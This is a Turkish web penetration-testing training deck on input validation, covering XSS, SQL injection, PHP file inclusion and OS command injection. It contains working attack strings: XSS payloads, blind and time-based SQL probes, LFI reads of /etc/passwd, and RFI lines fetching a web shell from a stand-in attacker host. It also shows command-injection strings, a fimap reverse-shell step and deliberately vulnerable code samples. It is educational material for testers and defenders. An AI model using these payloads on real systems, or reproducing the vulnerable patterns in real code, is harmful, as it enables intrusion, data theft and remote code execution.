SOC Kurulumu ve Yönetimi İçin Açık Kaynak Kodlu Çözümler
 
Veri Sızıntıları İçinden Bilgi Toplama: Distributed Denial of Secrets
Veri Sızıntıları İçinden Bilgi Toplama: Distributed Denial of SecretsVeri Sızıntıları İçinden Bilgi Toplama: Distributed Denial of Secrets
Veri Sızıntıları İçinden Bilgi Toplama: Distributed Denial of Secrets
 
Aktif Dizin (Active Directory) Güvenlik Testleri - I: Bilgi Toplama
Aktif Dizin (Active Directory) Güvenlik Testleri - I:  Bilgi ToplamaAktif Dizin (Active Directory) Güvenlik Testleri - I:  Bilgi Toplama
Aktif Dizin (Active Directory) Güvenlik Testleri - I: Bilgi Toplama
 
SSL Sertifikalarından Phishing Domain Tespiti
SSL Sertifikalarından Phishing Domain TespitiSSL Sertifikalarından Phishing Domain Tespiti
SSL Sertifikalarından Phishing Domain Tespiti
 

Web Uygulama Pentest Eğitimi

  • 1. Web Uygulama Pentest Eğitimi Konu: Girdi Denetimi @2014 Örnek Eğitim Notu bilgi@bga.com.tr Web Uygulama Pentest Eğitimi © 2014 |Bilgi Güvenliği AKADEMİSİ | www.bga.com.tr
  • 2. Girdi Denetimi • Uygulama kullanmadan önce bütün güvensiz verilerin doğru bir şekilde denetlenmesidir. • Bir çok saldırı çeşidinin temelinde yetersiz girdi kontrolü vardır; – Cross Site Scripting – SQL Injection – Remote / Local File Inclusion – ... Web Uygulama Pentest Eğitimi © 2014 |Bilgi Güvenliği AKADEMİSİ | www.bga.com.tr
  • 3. 1. Normalizasyon (Canonicalization) • Bir dizginin en basit, en temel haline çevrilmesidir. • Örnek, aşağıdaki iki yol aynı dosyayı işaret etmektedir; /../../etc/passwd /etc/passwd • Karmaşık ve kritik bir işlemdir. Web Uygulama Pentest Eğitimi © 2014 |Bilgi Güvenliği AKADEMİSİ | www.bga.com.tr
  • 4. Resultante Importante - URL Kodlama /index.my?id=prm%2523 browser v=getParam(“id”) print v; // prints prm%23 v=URLDecode(v); print v; // prints prm# uygulama çatısı kod Web Uygulama Pentest Eğitimi © 2014 |Bilgi Güvenliği AKADEMİSİ | www.bga.com.tr
  • 5. 2. Beyaz Liste Girdi Denetimi • Sadece iyi karakter veya karakter dizgilerinin kabul edilmesidir. • Güvenli ve tavsiye edilen girdi denetimidir. • Örnekler; – Kredi kartı girdi alanının geçerli kredi kartı numarası olup olmadığının kontrolü – Eposta adresi girdi alanının geçerli eposta olup olmadığının kontrolü Web Uygulama Pentest Eğitimi © 2014 |Bilgi Güvenliği AKADEMİSİ | www.bga.com.tr
  • 6. 3. Kara Liste Girdi Denetimi • Bilinen kötü karakter veya karakter dizgilerinin reddedilmesidir. • Çok kullanılan ama güvensiz girdi denetimidir. • Örnekler; – <script> geçen girdilerin reddedilmesi – or 1=1 -- geçen girdilerin reddedilmesi Web Uygulama Pentest Eğitimi © 2014 |Bilgi Güvenliği AKADEMİSİ | www.bga.com.tr
  • 7. 4. Temizleme İşlemi (Sanitize) • Girdinin kabul edilebilir bir formata çevrilmesidir. • Beyaz liste mantığı ile sanitize – Örn: Telefon numarası içinde geçen sayı, olmayan karakterlerin silinmesi • Kara liste mantığı ile sanitize – Örn: Adres girdisinin içindeki bütün tek tırnak karakterlerinin silinmesi Web Uygulama Pentest Eğitimi © 2014 |Bilgi Güvenliği AKADEMİSİ | www.bga.com.tr
  • 8. 5. Encoding İşlemi • Girdi içindeki özel karakterlerin başka bir formata değiştirilmesidir. • Amaç, hedef yorumlayıcı için özel karakterlerin kodlama işlemi sonrası önemlerini yitirmiş olmalarıdır. • Örnek; – HTML kodlama – URL kodlama Web Uygulama Pentest Eğitimi © 2014 |Bilgi Güvenliği AKADEMİSİ | www.bga.com.tr
  • 9. 6. Escape İşlemi • Yorumlayıcıya gitmeden gerçekleştirilen karakter format değişikliğidir. • Çoğu durumda kodlama ile aynı anlamdadır. • Örnek; – Oracle veritabanında çalışacak SQL sorgularında tek tırnak karakterlerinin iki tek tırnak ile değiştirilmesiyle, sorgu yapısının değiştirilmesi engellenebilir. Web Uygulama Pentest Eğitimi © 2014 |Bilgi Güvenliği AKADEMİSİ | www.bga.com.tr
  • 10. Çoğu Zafiyetin Kökeni Kod Veri Kapsam Web Uygulama Pentest Eğitimi © 2014 |Bilgi Güvenliği AKADEMİSİ | www.bga.com.tr
  • 11. Kod ve Verinin Karıştırılması veri kod A = "select * from users where id = " Web Uygulama Pentest Eğitimi © 2014 |Bilgi Güvenliği AKADEMİSİ | www.bga.com.tr
  • 12. Kod ve Verinin Karıştırılması veri kod A = "/opt/myapp/startcmd.sh --str " Web Uygulama Pentest Eğitimi © 2014 |Bilgi Güvenliği AKADEMİSİ | www.bga.com.tr
  • 13. Kod ve Verinin Karıştırılması veri kod A = "Siparişinizin hazırlanma süresi "; eval(A); </script> Web Uygulama Pentest Eğitimi © 2014 |Bilgi Güvenliği AKADEMİSİ | www.bga.com.tr
  • 14. XSS Nedir? Uygulama Browser Web Uygulama Pentest Eğitimi © 2014 |Bilgi Güvenliği AKADEMİSİ | www.bga.com.tr
  • 15. Cross Site Scripting - XSS • Html/dhtml/css veya javascript kodunun izinsiz olarak kurbanın tarayıcısında çalıştırılmasıdır. • Üç genel XSS çeşidi mevcuttur; – Reflected – Stored – DOM Based Web Uygulama Pentest Eğitimi © 2014 |Bilgi Güvenliği AKADEMİSİ | www.bga.com.tr
  • 16. Reflected XSS Web Uygulama Pentest Eğitimi © 2014 |Bilgi Güvenliği AKADEMİSİ | www.bga.com.tr
  • 17. Stored XSS - Senaryo Web Uygulama Pentest Eğitimi © 2014 |Bilgi Güvenliği AKADEMİSİ | www.bga.com.tr
  • 18. DOM Based XSS - Senaryo Web Uygulama Pentest Eğitimi © 2014 |Bilgi Güvenliği AKADEMİSİ | www.bga.com.tr
  • 19. XSS - MySpace Worm Web Uygulama Pentest Eğitimi © 2014 |Bilgi Güvenliği AKADEMİSİ | www.bga.com.tr
  • 20. XSS - MySpace Worm Web Uygulama Pentest Eğitimi © 2014 |Bilgi Güvenliği AKADEMİSİ | www.bga.com.tr
  • 21. XSS - MySpace Worm Web Uygulama Pentest Eğitimi © 2014 |Bilgi Güvenliği AKADEMİSİ | www.bga.com.tr
  • 22. XSS - MySpace Worm Web Uygulama Pentest Eğitimi © 2014 |Bilgi Güvenliği AKADEMİSİ | www.bga.com.tr
  • 23. XSS - Diğer Wormlar • • • • • • • • • Orkut Justin.tv Yahoo! Mail Facebook Twitter Reddit Digg MySpace … Web Uygulama Pentest Eğitimi © 2014 |Bilgi Güvenliği AKADEMİSİ | www.bga.com.tr
  • 24. XSS - Neden Olduğu Problemler • Bilgi Hırsızlığı – Oturum Korsanlığı – Clipboard Veri Çalma, Tuş Yakalama, Ekran Çalma • • • • İçerik Değişikliği (Defacement) Geçmiş Tarama, Port Tarama Dahili IP Çalma, Web Spidering, XSS Botnet Açıklık Tarama, Worm Web Uygulama Pentest Eğitimi © 2014 |Bilgi Güvenliği AKADEMİSİ | www.bga.com.tr
  • 25. XSS - İstatistikler Web Uygulama Pentest Eğitimi © 2014 |Bilgi Güvenliği AKADEMİSİ | www.bga.com.tr
  • 26. XSS - Temel Test Tekniği - Analiz 1. XSS için denetlenecek parametre belirlenir 2. Bu parametreye abcde gibi basit bir değer verilerek istek yapılır 3. Cevap içerisinde abcde nerelerde geçiyor hesaplanır. – – – – HTML HTML Attribute Javascript URL Web Uygulama Pentest Eğitimi © 2014 |Bilgi Güvenliği AKADEMİSİ | www.bga.com.tr
  • 27. XSS - Temel Test Tekniği - Test 1. Analiz sonucu parametre değeri olarak uygun payload gönderilir, 2. Cevabın içinde payload aranır, 3. Bulunduğunda sayfa içinde payload uygun kodlama işleminden geçirilmemiş ise XSS güvenlik zafiyetinden bahsedilir. Web Uygulama Pentest Eğitimi © 2014 |Bilgi Güvenliği AKADEMİSİ | www.bga.com.tr
  • 28. XSS - Payload 1 <plaintext> Web Uygulama Pentest Eğitimi © 2014 |Bilgi Güvenliği AKADEMİSİ | www.bga.com.tr
  • 29. XSS - Payload 1 - Örnek 1 2 Web Uygulama Pentest Eğitimi © 2014 |Bilgi Güvenliği AKADEMİSİ | www.bga.com.tr
  • 30. XSS - Payload 2 ';prompt(String.fromCharCode(88,83,83))//'; prompt(String.fromCharCode(88,83,83))//"; prompt(String.fromCharCode(88,83,83))//"; prompt(String.fromCharCode(88,83,83))//-></ScRIPT>">'><ScRIPT> prompt(String.fromCharCode(88,83,83))</ScRI PT> Web Uygulama Pentest Eğitimi © 2014 |Bilgi Güvenliği AKADEMİSİ | www.bga.com.tr
  • 31. XSS - Payload 3 '';!--"<abc>=&{()} Web Uygulama Pentest Eğitimi © 2014 |Bilgi Güvenliği AKADEMİSİ | www.bga.com.tr
  • 32. Raw Echo - Payload 1 2 Web Uygulama Pentest Eğitimi © 2014 |Bilgi Güvenliği AKADEMİSİ | www.bga.com.tr
  • 33. HTML Attribute - Payload 1 2 Web Uygulama Pentest Eğitimi © 2014 |Bilgi Güvenliği AKADEMİSİ | www.bga.com.tr
  • 34. HTML Attribute Interactive - Payload 1 2 Web Uygulama Pentest Eğitimi © 2014 |Bilgi Güvenliği AKADEMİSİ | www.bga.com.tr
  • 35. Javascript Injection - Payload 1 2 Web Uygulama Pentest Eğitimi © 2014 |Bilgi Güvenliği AKADEMİSİ | www.bga.com.tr
  • 36. innerHTML ByPass - Payload 1 2 Web Uygulama Pentest Eğitimi © 2014 |Bilgi Güvenliği AKADEMİSİ | www.bga.com.tr
  • 37. CSS – Internet Explorer - Payload 1 2 Web Uygulama Pentest Eğitimi © 2014 |Bilgi Güvenliği AKADEMİSİ | www.bga.com.tr
  • 38. DOM Based XSS Sunucuya giden parametre Web Uygulama Pentest Eğitimi © 2014 |Bilgi Güvenliği AKADEMİSİ | www.bga.com.tr
  • 39. DOM Based XSS Web Uygulama Pentest Eğitimi © 2014 |Bilgi Güvenliği AKADEMİSİ | www.bga.com.tr
  • 40. DOM Based XSS Sunucuya giden parametre yok! Web Uygulama Pentest Eğitimi © 2014 |Bilgi Güvenliği AKADEMİSİ | www.bga.com.tr
  • 41. DOM Based XSS Sunucuya giden XSS String yok! Web Uygulama Pentest Eğitimi © 2014 |Bilgi Güvenliği AKADEMİSİ | www.bga.com.tr
  • 42. SQL Injection Nedir? • SQL Injection; – Saldırganlar için en popüler, – Geliştiriciler için en bilindik, – İş sahipleri için en tehlikeli • Hedef veritabanında uygulama yolu ile yetkisiz olarak sql sorgularının çalıştırılabilmesidir. Web Uygulama Pentest Eğitimi © 2014 |Bilgi Güvenliği AKADEMİSİ | www.bga.com.tr
  • 43. SQL Injection - Senaryo Dinamik bir SQL sorgusu SELECT * FROM users WHERE id=$id; Normal bir değişken değeri SELECT * FROM users WHERE id=100 Anormal bir değişken değeri: SQL Enjeksiyonu SELECT * FROM users WHERE id=100 OR 2>1 Web Uygulama Pentest Eğitimi © 2014 |Bilgi Güvenliği AKADEMİSİ | www.bga.com.tr
  • 44. SQL Injection Web Uygulama Pentest Eğitimi © 2014 |Bilgi Güvenliği AKADEMİSİ | www.bga.com.tr
  • 45. SQL Injection Web Uygulama Pentest Eğitimi © 2014 |Bilgi Güvenliği AKADEMİSİ | www.bga.com.tr
  • 46. SQL Injection Web Uygulama Pentest Eğitimi © 2014 |Bilgi Güvenliği AKADEMİSİ | www.bga.com.tr
  • 47. SQL Injection ile 2012 Web Uygulama Pentest Eğitimi © 2014 |Bilgi Güvenliği AKADEMİSİ | www.bga.com.tr
  • 48. SQL Injection - İstatistikler Web Uygulama Pentest Eğitimi © 2014 |Bilgi Güvenliği AKADEMİSİ | www.bga.com.tr
  • 49. SQL Injection - İstatistikler Web Uygulama Pentest Eğitimi © 2014 |Bilgi Güvenliği AKADEMİSİ | www.bga.com.tr
  • 50. SQL Injection Çeşitleri • Olma şeklinden – Integer – String • Saldırı Perspektifinden – Kör (Blind) – Zaman Tabanlı – Union – Hata Tabanlı – Out of Band Web Uygulama Pentest Eğitimi © 2014 |Bilgi Güvenliği AKADEMİSİ | www.bga.com.tr
  • 51. Integer SQL Injection - Test Teknikleri /urundetay.aspx?id=5 select * from products where id=5 Orijinal Cevap Ürün Detayı Led TV Web Uygulama Pentest Eğitimi © 2014 |Bilgi Güvenliği AKADEMİSİ | www.bga.com.tr
  • 52. Integer SQL Injection - Test Teknikleri /urundetay.aspx?id=5’ select * from products where id=5’ HATA SAYFASI Web Uygulama Pentest Eğitimi © 2014 |Bilgi Güvenliği AKADEMİSİ | www.bga.com.tr
  • 53. Integer SQL Injection - Test Teknikleri /urundetay.aspx?id=5 waitfor delay ‘00:00:05’ -select * from products where id=5 waitfor delay ‘00:00:05’ -- Orijinal Cevap 5 sn gecikmeli Ürün Detayı Led TV Web Uygulama Pentest Eğitimi © 2014 |Bilgi Güvenliği AKADEMİSİ | www.bga.com.tr
  • 54. Integer SQL Injection - Test Teknikleri /urundetay.aspx?id=5 select * from products where id=5 Orijinal Cevap Ürün Detayı Led TV Orijinal Cevap /urundetay.aspx?id=5 and 5=5 select * from products where id=5 and 5=5 /urundetay.aspx?id=5 and 5=6 Ürün Detayı Led TV HATA SAYFASI select * from products where id=5 and 5=6 Web Uygulama Pentest Eğitimi © 2014 |Bilgi Güvenliği AKADEMİSİ | www.bga.com.tr
  • 55. String SQL Injection - Test Teknikleri /goster.do?isim=muro select * from users where name=‘muro’ Orijinal Cevap Kullanıcı Detayı Muro Web Uygulama Pentest Eğitimi © 2014 |Bilgi Güvenliği AKADEMİSİ | www.bga.com.tr
  • 56. String SQL Injection - Test Teknikleri /goster.do?isim=muro’ select * from users where name=‘muro’’ HATA SAYFASI Web Uygulama Pentest Eğitimi © 2014 |Bilgi Güvenliği AKADEMİSİ | www.bga.com.tr
  • 57. String SQL Injection - Test Teknikleri /goster.do?isim=muro’ and SLEEP(5) %23 select * from users where name=‘muro’ and SLEEP(5) # ’ Orijinal Cevap 5 sn gecikmeli Kullanıcı Detayı Muro Web Uygulama Pentest Eğitimi © 2014 |Bilgi Güvenliği AKADEMİSİ | www.bga.com.tr
  • 58. String SQL Injection - Test Teknikleri /goster.do?isim=muro select * from users where name=‘muro’ Orijinal Cevap Kullanıcı Detayı Muro Orijinal Cevap /goster.do?isim=muro’ and ‘5’=‘5 select * from users where name=‘muro’ and ‘5’=‘5’ /goster.do?isim=muro’ and ‘5’=‘6 Kullanıcı Detayı Muro HATA SAYFASI select * from users where name=‘muro’ and ‘5’=‘6’ Web Uygulama Pentest Eğitimi © 2014 |Bilgi Güvenliği AKADEMİSİ | www.bga.com.tr
  • 59. Blind SQL Injection Teori - MySQL select version() 5.0.51b-community-nt select mid(version(), 7, 1) b select ord(mid(version(), 7, 1)) 98 Veritabanı Versiyonu Veritabanı Versiyonunun Yedinci Karakteri Versiyonun Yedinci Karakterinin ASCII Değeri Web Uygulama Pentest Eğitimi © 2014 |Bilgi Güvenliği AKADEMİSİ | www.bga.com.tr
  • 60. Kör SQL Injection 63 1 127 /urundetay.aspx?id=5 and ord(mid(version(), 7, 1)) > 63 select * from products where id=5 and ord(mid(version(), 7, 1)) > 63 5.0.51b-community-nt b 98 Orijinal Cevap Ürün Detayı Led TV Web Uygulama Pentest Eğitimi © 2014 |Bilgi Güvenliği AKADEMİSİ | www.bga.com.tr
  • 61. Kör SQL Injection 95 63 127 /urundetay.aspx?id=5 and ord(mid(version(), 7, 1)) > 95 select * from products where id=5 and ord(mid(version(), 7, 1)) > 95 5.0.51b-community-nt b 98 Orijinal Cevap Ürün Detayı Led TV Web Uygulama Pentest Eğitimi © 2014 |Bilgi Güvenliği AKADEMİSİ | www.bga.com.tr
  • 62. Kör SQL Injection 111 95 127 /urundetay.aspx?id=5 and ord(mid(version(), 7, 1)) > 111 select * from products where id=5 and ord(mid(version(), 7, 1)) > 111 5.0.51b-community-nt b 98 HATA SAYFASI Web Uygulama Pentest Eğitimi © 2014 |Bilgi Güvenliği AKADEMİSİ | www.bga.com.tr
  • 63. MySQL Escape - Orijinal Escaped NULL 0 " " % % ' ' _ _ Web Uygulama Pentest Eğitimi © 2014 |Bilgi Güvenliği AKADEMİSİ | www.bga.com.tr
  • 64. MySQL Escape - Hata $user = ""; if(isset($_GET['user'])) $user = $_GET['user']; $userEsc = str_replace("'", "''", $user); $q = "SELECT * FROM users where u = '" . $userEsc . "'"; $result = mysql_query($q); Web Uygulama Pentest Eğitimi © 2014 |Bilgi Güvenliği AKADEMİSİ | www.bga.com.tr
  • 65. Code Injection • Saldırganın hedef web uygulaması üzerine zararlı kod veya kod parçacığı eklemesidir. • Büyük çoğunlukla PHP tabanlı uygulamalar da bulunsa da JEE/ASP.NET uygulamalarında da görmek mümkündür. Web Uygulama Pentest Eğitimi © 2014 |Bilgi Güvenliği AKADEMİSİ | www.bga.com.tr
  • 66. PHP Include • Karmaşık kodları daha iyi yönetebilmek için modülariteyi arttırmak amacı ile PHP çatısında, bir PHP dosyasına başka bir PHP dosyasının dahil edilmesi özelliği vardır. • Bu işlem için aşağıdaki fonksiyonlar kullanılır – include(dosya_ismi) – require(dosya_ismi) – include_once(dosya_ismi) – require_once(dosya_ismi) Web Uygulama Pentest Eğitimi © 2014 |Bilgi Güvenliği AKADEMİSİ | www.bga.com.tr
  • 67. PHP Include - Örnek index.php <html> <body> <?php include 'header.php'; ?> <h1>Merhaba <?php echo $user ?> Ana sayfaya Hoşgeldiniz...</h1> ... header.php <?php $user = $_SESSION[‘user’]; ?> Web Uygulama Pentest Eğitimi © 2014 |Bilgi Güvenliği AKADEMİSİ | www.bga.com.tr
  • 68. PHP Include - Örnek index.php <html> <body> <?php $user = $_SESSION[‘user’]; ?> <h1>Merhaba <?php echo $user ?> Ana sayfaya Hoşgeldiniz...</h1> ... header.php dosyası içeriği kopyalandı ve index.php dosyasına yapıştırıldı. Web Uygulama Pentest Eğitimi © 2014 |Bilgi Güvenliği AKADEMİSİ | www.bga.com.tr
  • 69. Code Injection - PHP • PHP include/require fonksiyonlarına giden parametre değerleri saldırganlar tarafından değiştirilebilirse, • Diğer sistem ve uygulama dosyaları da çalıştırılacak PHP dosyaları içine kopyalanıp, saldırgana cevap olarak dönebilir. Web Uygulama Pentest Eğitimi © 2014 |Bilgi Güvenliği AKADEMİSİ | www.bga.com.tr
  • 70. Code Injection - Senaryo index.php 1 /index.php?lang=tr sonuç 2 <?php $language = $_REQUEST[‘lang’]; include($language.”.php”); … ?> 3 tr.php <?php … ?> Web Uygulama Pentest Eğitimi © 2014 |Bilgi Güvenliği AKADEMİSİ | www.bga.com.tr
  • 71. Code Injection - Saldırı - LFI index.php 1 /index.php?lang=/etc/paswd%00 sonuç 2 <?php $language = $_REQUEST[‘lang’]; include($language.”.php”); … ?> 3 /etc/passwd root:: guvenlikod:: … Web Uygulama Pentest Eğitimi © 2014 |Bilgi Güvenliği AKADEMİSİ | www.bga.com.tr
  • 72. Code Injection - Saldırı - RFI 1 /index.php?lang=http://www.saldirgan.com/webshell.txt? index.php sonuç 2 4 www.saldirgan.com php web shell <?php $language = $_REQUEST[‘lang’]; include($language.”.php”); … ?> 3 Web Uygulama Pentest Eğitimi © 2014 |Bilgi Güvenliği AKADEMİSİ | www.bga.com.tr
  • 73. Örnek Saldırı String’leri RFI-Remote File Inclusion: Uzaktan kod çağırma/dosya dahil etme ?id=http://saldirgan.com/myshell.txt%00 ?id=http://saldirgan.com/myshell.txt? LFI-Local File Inclusion: Server içinden kod çağırma/dosya dahil etme ?id=../../../uploads/myshell.txt ?id=../../../uploads/myshell.txt%00 77 Web Uygulama Pentest Eğitimi © 2014 |Bilgi Güvenliği AKADEMİSİ | www.bga.com.tr
  • 75. Fimap ile Otomatik RFI/LFI • PHP uygulamalarında otomatik RFI ve LFI bulmak için Python ile yazılmış bir araçtır. • http://code.google.com/p/fimap/ • >= Python 2.4 • Versiyon alpha_09 Web Uygulama Pentest Eğitimi © 2014 |Bilgi Güvenliği AKADEMİSİ | www.bga.com.tr
  • 76. Fimap - Örnek python >=2.4gereksinimi python fimap.py -u http://sunucu/index.php?pg= -x Parametreler ile beraber denetlenecek URL Başarılı saldırı sonrası interaktif bir oturum açılması Web Uygulama Pentest Eğitimi © 2014 |Bilgi Güvenliği AKADEMİSİ | www.bga.com.tr
  • 77. Fimap - Reverse Shell 3 1 2 4 5 Web Uygulama Pentest Eğitimi © 2014 |Bilgi Güvenliği AKADEMİSİ | www.bga.com.tr
  • 78. OS Commanding • Uygulamalar geliştirilirken işletim sistemi komutları çalıştırma ihtiyacı olabilir. – Örn: Popüler komut satırı Unix/Linux/Windows uygulamalarına web arayüzü yazılması; • iptables, asterisk, qmail, v.b. • Yetersiz girdi kontrolü nedeniyle saldırganın hedef web uygulamasını kullanarak işletim sisteminde komutlar çalıştırması OS Commanding olarak adlandırılır. Web Uygulama Pentest Eğitimi © 2014 |Bilgi Güvenliği AKADEMİSİ | www.bga.com.tr
  • 79. OS Commanding - Ön Bilgi KULLANICI KOMUT SATIRI İŞLETİM SİSTEMİ DONANIM Web Uygulama Pentest Eğitimi © 2014 |Bilgi Güvenliği AKADEMİSİ | www.bga.com.tr
  • 80. OS Commanding - Unix - Ön Bilgi ls -al Web Uygulama Pentest Eğitimi © 2014 |Bilgi Güvenliği AKADEMİSİ | www.bga.com.tr
  • 81. OS Commanding - Windows - Ön Bilgi dir . Web Uygulama Pentest Eğitimi © 2014 |Bilgi Güvenliği AKADEMİSİ | www.bga.com.tr
  • 82. OS Commanding - Unix - Ön Bilgi grep com myfile.txt Web Uygulama Pentest Eğitimi © 2014 |Bilgi Güvenliği AKADEMİSİ | www.bga.com.tr
  • 83. OS Commanding - Unix - Ön Bilgi ping www.guvenlikod.com Web Uygulama Pentest Eğitimi © 2014 |Bilgi Güvenliği AKADEMİSİ | www.bga.com.tr
  • 84. OS Commanding - Unix -| ls -al | ping www.guvenlikod.com Web Uygulama Pentest Eğitimi © 2014 |Bilgi Güvenliği AKADEMİSİ | www.bga.com.tr
  • 85. OS Commanding - Windows -| dir C: | ping www.guvenlikod.com Web Uygulama Pentest Eğitimi © 2014 |Bilgi Güvenliği AKADEMİSİ | www.bga.com.tr
  • 86. OS Commanding - Unix - ; ls -al ; ping www.guvenlikod.com Web Uygulama Pentest Eğitimi © 2014 |Bilgi Güvenliği AKADEMİSİ | www.bga.com.tr
  • 87. OS Commanding - Windows - & dir . & ping www.guvenlikod.com Web Uygulama Pentest Eğitimi © 2014 |Bilgi Güvenliği AKADEMİSİ | www.bga.com.tr
  • 88. OS Commanding - Unix - || ls -al || ping www.guvenlikod.com 1 2 Web Uygulama Pentest Eğitimi © 2014 |Bilgi Güvenliği AKADEMİSİ | www.bga.com.tr
  • 89. OS Commanding - Windows - || dir . || ping www.guvenlikod.com 1 2 Web Uygulama Pentest Eğitimi © 2014 |Bilgi Güvenliği AKADEMİSİ | www.bga.com.tr
  • 90. OS Commanding - Unix - & ls -al & ping www.guvenlikod.com Web Uygulama Pentest Eğitimi © 2014 |Bilgi Güvenliği AKADEMİSİ | www.bga.com.tr
  • 91. OS Commanding - Unix - && ls -al && ping www.guvenlikod.com Web Uygulama Pentest Eğitimi © 2014 |Bilgi Güvenliği AKADEMİSİ | www.bga.com.tr
  • 92. OS Commanding - Windows - && dir . && ping www.guvenlikod.com 1 2 Web Uygulama Pentest Eğitimi © 2014 |Bilgi Güvenliği AKADEMİSİ | www.bga.com.tr
  • 93. OS Commanding - Tanım • Uygulamalar geliştirilirken işletim sistemi komutları çalıştırma ihtiyacı olabilir. – Örn: Popüler komut satırı Unix/Linux/Windows uygulamalarına web arayüzü yazılması; • iptables, asterisk, qmail, v.b. • Yetersiz girdi kontrolü nedeniyle saldırganın hedef web uygulamasını kullanarak işletim sisteminde komutlar çalıştırması OS Commanding olarak adlandırılır. Web Uygulama Pentest Eğitimi © 2014 |Bilgi Güvenliği AKADEMİSİ | www.bga.com.tr
  • 94. 1. Komut 4. Sayfa + Cevap UYGULAMA OS Commanding - Senaryo 2. Komut 3. Cevap Web Uygulama Pentest Eğitimi © 2014 |Bilgi Güvenliği AKADEMİSİ | www.bga.com.tr
  • 95. OS Commanding - Xerox WorkCentre Web Uygulama Pentest Eğitimi © 2014 |Bilgi Güvenliği AKADEMİSİ | www.bga.com.tr
  • 96. OS Commanding - Xerox WorkCentre function=HTTP_IP_Restriction_Update&Prot INPUT tcp ACCEPT ocol=tcp&Action=ACCEPT&Chain=INPUT&Int erface=eth0&SourceIP=1.2.3.4&Dport=80&S eth0 1.2.3.4 rcPort=443 iptables -A -p -i -s -j Web Uygulama Pentest Eğitimi © 2014 |Bilgi Güvenliği AKADEMİSİ | www.bga.com.tr
  • 97. OS Commanding - Xerox WorkCentre function=HTTP_IP_Restriction_Update&Prot tcp ACCEPT ocol=tcp&Action=ACCEPT | ping www.webguvenligi.org&Chain=INPUT&Interf www.webguvenligi.org ace=eth0&SourceIP=1.2.3.4&Dport=80&SrcP ort=443 iptables -A -p -i -s -j Web Uygulama Pentest Eğitimi © 2014 |Bilgi Güvenliği AKADEMİSİ | www.bga.com.tr
  • 98. OS Commanding public string executeCommand(String hostName) { try { String host = hostName; Runtime rt = Runtime.getRuntime(); rt.exec("cmd.exe /C nslookup " + host); } catch(Exception e){ e.printStackTrace(); } } Web Uygulama Pentest Eğitimi © 2014 |Bilgi Güvenliği AKADEMİSİ | www.bga.com.tr
  • 99. OS Commanding - İstatistikler Web Uygulama Pentest Eğitimi © 2014 |Bilgi Güvenliği AKADEMİSİ | www.bga.com.tr
  • 100. OS Commanding - Test Teknikleri ?id=/bin/ls| ?id=; cat /etc/passwd ?id=; cat /../etc/X11/../passwd Web Uygulama Pentest Eğitimi © 2014 |Bilgi Güvenliği AKADEMİSİ | www.bga.com.tr
  • 101. OS Commanding - Test Teknikleri ?id=| dir C: ?id=|| dir C: ?id= & dir C: ?id= && dir C: Web Uygulama Pentest Eğitimi © 2014 |Bilgi Güvenliği AKADEMİSİ | www.bga.com.tr